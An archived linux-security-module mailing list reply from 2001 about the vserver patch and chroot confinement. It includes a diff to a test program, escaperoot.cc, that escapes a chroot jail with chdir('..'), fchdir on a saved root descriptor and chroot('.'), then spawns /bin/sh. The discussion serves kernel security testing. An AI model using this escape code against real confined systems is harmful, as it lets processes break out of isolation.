Re: Anyone tried the "vserver" patch?

• Previous message: Crispin Cowan: "Re: [ANNOUNCE] 2001_12_10 patch against 2.4.16"
• In reply to: Jacques Gelinas: "Re: Anyone tried the "vserver" patch?"
• Next in thread: Crispin Cowan: "Re: Anyone tried the "vserver" patch?"
• Reply: Crispin Cowan: "Re: Anyone tried the "vserver" patch?"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

* Jacques Gelinas (jackat_private) wrote:
> 
> You keep your current directory and do a chroot in a sub-directory. Then your
> current directory is out of scope, compared to the new root. So you are free to
> chdir("..") to the real root.

this is exactly what i'm referring to.  chroot("test") does not effect
current working dir.  so chroot("..") breaks you right back out.
it's still this way.  i have a simple program that illustrates this.

but chroot(1) does chroot("test"), chdir("/").  now if you try and play
with ".." you are already at the root of your jail, so you can't break
out with "." or ".." tricks.  so, if you are running your escaperoot.cc
test in a vserver, i believe you that it can't get out.

hmmm, i just looked at escaperoot.cc, and it doesn't break out against
a plain kernel (no vserver) without the changes below ...you may want
to rerun your test??

i had to take the chdir for loop out, it seems .. gets lost once you pass the
real root.  i run the test from /tmp, so one chdir("..") is enough to get
to the real root.

cheers,
-chris

--- escaperoot.cc.orig	Mon Dec 10 21:21:10 2001
+++ escaperoot.cc	Mon Dec 10 22:45:51 2001
@@ -33,8 +33,12 @@
 		fprintf (stderr,"Can't chroot into dummy_dir (%s)\n",strerror(errno));
 	}else{
 		// Try to chdir into the real root
-		for (int i=0; i<1000; i++) chdir("..");
+	//	for (int i=0; i<1000; i++) chdir("..");
+		chdir("..");
 		print_pwd();
+		if (chroot(".") == -1) {
+			fprintf(stderr,"couldn't break out (%s\n",strerror(errno));
+		}
 		if (execl ("/bin/sh","/bin/sh",NULL)==-1){
 			fprintf (stderr,"execl /bin/sh failed (%s)\n",strerror(errno));
 		}
@@ -50,18 +54,20 @@
 	printf ("test2\n");
 	print_pwd();
 	mkdir ("dummy_dir",0755);
-	int fd = open (".",O_RDONLY);
+	/* capture the real root before chroot */
+	int fd = open ("/",O_RDONLY);
 	if (fd == -1){
 		fprintf (stderr,"Can't open current directory (%s)\n",strerror(errno));
 	}else if (chroot ("dummy_dir")==-1){
 		fprintf (stderr,"Can't chroot into dummy_dir (%s)\n",strerror(errno));
-	}else if (fchdir(fd)==-1){
+	}else if (fchdir(fd)==-1){ /* should be in real root now */
 		fprintf (stderr,"Can't fchdir to the current directory (%s)\n"
 			,strerror(errno));
 	}else{
-		// Try to chdir into the real root
-		for (int i=0; i<1000; i++) chdir("..");
 		print_pwd();
+		if (chroot(".") == -1) { /* break out, back to real root */
+			fprintf(stderr,"couldn't break out (%s\n",strerror(errno));
+		}
 		if (execl ("/bin/sh","/bin/sh",NULL)==-1){
 			fprintf (stderr,"execl /bin/sh failed (%s)\n",strerror(errno));
 		}

_______________________________________________
linux-security-module mailing list
linux-security-moduleat_private
http://mail.wirex.com/mailman/listinfo/linux-security-module

• Next message: Crispin Cowan: "Re: Anyone tried the "vserver" patch?"
• Previous message: Crispin Cowan: "Re: [ANNOUNCE] 2001_12_10 patch against 2.4.16"
• In reply to: Jacques Gelinas: "Re: Anyone tried the "vserver" patch?"
• Next in thread: Crispin Cowan: "Re: Anyone tried the "vserver" patch?"
• Reply: Crispin Cowan: "Re: Anyone tried the "vserver" patch?"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Dec 10 2001 - 22:49:24 PST